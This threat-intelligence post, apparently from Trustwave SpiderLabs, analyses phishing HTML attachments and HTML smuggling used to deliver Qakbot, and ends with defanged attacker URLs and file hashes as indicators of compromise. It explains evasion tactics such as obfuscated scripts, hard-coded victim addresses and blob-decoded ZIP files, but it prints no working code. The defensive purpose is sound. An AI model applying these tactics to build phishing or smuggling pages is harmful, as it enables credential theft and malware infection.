Introduction
This past month, Trustwave SpiderLabs observed that HTML (Hypertext Markup Language) file attachments had become a common occurrence in our spam traps, which is not unusual since malware is often delivered through phishing spam. For the past 30 days, SpiderLabs has found the combination of .HTML (11.39%) and .HTM (2.7%) files are our second most spammed file attachment, totaling 14.09%, followed by .EXE files at 12.84%.
Figure 1: HTML file attachment type percentages
These threat actors are phishers, the main purpose is to steal sensitive information (like login credentials and credit card information) either for identity theft, extortion, to get access to the victim’s finances, to buy goods or services, etc.
According to Microsoft, cybercriminal group DEV-0238 and DEV-0253 have also been sending HTML attachments that use HTML smuggling to deliver keyloggers. Microsoft has also attributed HTML smuggling to cybercriminal group DEV-0193 with HTML smuggling to deliver Trickbot malware.
Phishing attacks using HTML attachments
The most common spammed HTML attachments seen are phishing pages. The HTML file itself is generally benign, meaning it does not have any malicious code that launches arbitrary code into the system. This attachment, however, should be treated with caution. It mimics the sign-in page for services like Microsoft, Google or online banking pages and the danger is when a user falls for the scam, enters their credentials into the form, and submits it.
Figure 2: Samples of phishing email with HTML attachments
Figure 3: HTML attachments that mimic Microsoft sign-in page. The phishing page may also have the target user’s email address hard-coded in the page.
SpiderLabs noticed that recent phishing HTML files contained the hard-coded email addresses of the target user – this makes it more convincing to the victim. In the source level, adversaries would employ various levels of code obfuscation. JavaScript codes are usually obfuscated with open-source tools like JavaScript Obfuscator. HTML files are not stand-alone though, as they pull additional jQuery library, CSS and JavaScript code from various remote web servers for handling form objects, and form actions.
Hard-coding the email addresses helps trick the victim into believing they had previously signed-on to the page, since they only need to enter their password. Overall, this tactic makes the email appear more legitimate.
Below is an HTML source from one of the phishing attacks. It shows the level of JavaScript obfuscation.
Figure 4: Phishing HTML source code
In most instances, the HTML file is not fully autonomous. The JavaScript source injected as inline scripts are usually loaded from a remote server, from a mixture of legitimate CDN (content delivery network) hosts, or from the host operated by the actors. Usually, the JavaScript that handles the data exfiltration is hosted by the actor’s web server (or operated by them).
Figure 5: Inspecting the HTML source shows the JavaScript files it pulls from the remote web server.
Figure 6: A JavaScript code loaded from the remote host (valdia.quatiappcn.pw) by the HTML attachment file. It handles additional HTML DOM form actions, jQuery objects, CSS styling as well as anti-debugging and URL form checking.
Malware Delivery using HTML smuggling
To evade email gateways, a technique called HTML smuggling is being utilized by adversaries to deliver malware binary to a target user. This method employs HTML 5 that could work offline by storing a binary in an immutable blob of data in the form of a JavaScript code. When opened through a web browser, the data blob gets decoded into a file object. A download notification bar is then displayed to the user. With a combination of social engineering, it lures the target user to save the binary to the disk to open it.
The screenshot below is an example of a spam campaign with an HTML file attachment.
Figure 7: An example of a Qakbot spam campaign that uses HTML file attachment
When loaded into a browser, the HTML file invokes a JavaScript that seemingly looks like a file was downloaded from a remote web server. The zip file, however, is smuggled within the HTML source as a data blob, gets decoded by the JavaScript code and converted into a ZIP file.
Figure 8: File smuggling
The HTML source would look something like the screenshot below:
Figure 8.1: HTML source example
Shown below is the attack flow overview:
Figure 9: Attack flow overview
Conclusion:
As you can see, obfuscation is the common denominator of this spammed HTML attachment. This just shows how difficult it is to detect this kind of threat in the email gateway layer. Although most of the time HTML files are benign when opened, the danger is subsequent to the user’s action. Coupled with social engineering, this is what makes this type of attack successful.
IOCs
URLs
hxxps://valdia[.]quatiappcn[.]pw
hxxps://fatnaoacnsoxzssa[.]web[.]app/nyrsjhrgsdvxzzx/themes/css/435d220bee10a57b635805e70b50fd90nbr1657558944[.]css
hxxps://fatnaoacnsoxzssa[.]web[.]app/nyrsjhrgsdvxzzx/themes/css/2a4e8eea72f5947287e793a9b9355d9fnbr1657558944[.]css
hxxps://unpkg[.]com/axios@0[.]16[.]1/dist/axios[.]min[.]js
hxxps://fatnaoacnsoxzssa[.]web[.]app/nyrsjhrgsdvxzzx/themes/435d220bee10a57b635805e70b50fd90nbr1657558944[.]js
hxxps://unpkg[.]com/vue@2[.]6[.]11/dist/vue[.]min.js
hxxps://unpkg[.]com/vue-router@2[.]7[.]0/dist/vue-router[.]min[.]js
hxxps://cdnjs[.]cloudflare[.]com/ajax/libs/vuex/2[.]3[.]1/vuex[.]min[.]js
hxxps://ajax[.]googleapis[.]com/ajax/libs/jquery/3[.]2[.]1/jquery[.]min[.]js
hxxps://cdnjs[.]cloudflare[.]com/ajax/libs/vee-validate/2[.]0[.]0-rc[.]3/vee-validate[.]min[.]js
hxxps://cdnjs[.]cloudflare[.]com/ajax/libs/vue-i18n/7[.]0[.]3/vue-i18n[.]min[.]js
hxxps://unpkg[.]com/lodash@4[.]17[.]4/lodash[.]min[.]js
hxxps://cdnjs[.]cloudflare[.]com/ajax/libs/mobile-detect/1[.]3[.]6/mobile-detect[.]min[.]js
hxxps://fatnaoacnsoxzssa[.]web[.]app/nyrsjhrgsdvxzzx/themes/708d225d43415316016978101b90d070[.]js
Hashes
Phishing HTML attachment
8ac0f6c2c31934801c4c6ae5606997b5c84a59290287059ec8ea68754921899a
(SHA256)
ScannedDocuments_9720709.html.zip
e1c7c9ba81d2c8bd09b1cdc25ccb44e6763f8906486c5298c40efcb2133ad017
(SHA256)
ScannedDocuments_9720709.html : Qakbot
Cecfabcc1b8f0467a0f646d0a75bd3a94e71c1a2ca41380b75f3a60e7827d2b9
(SHA256)
ScannedDocuments_9720709.img : Qakbot
1cbc3422305b203bba574a0d59263e377c61a198f229430131570045c59a3521
(SHA256)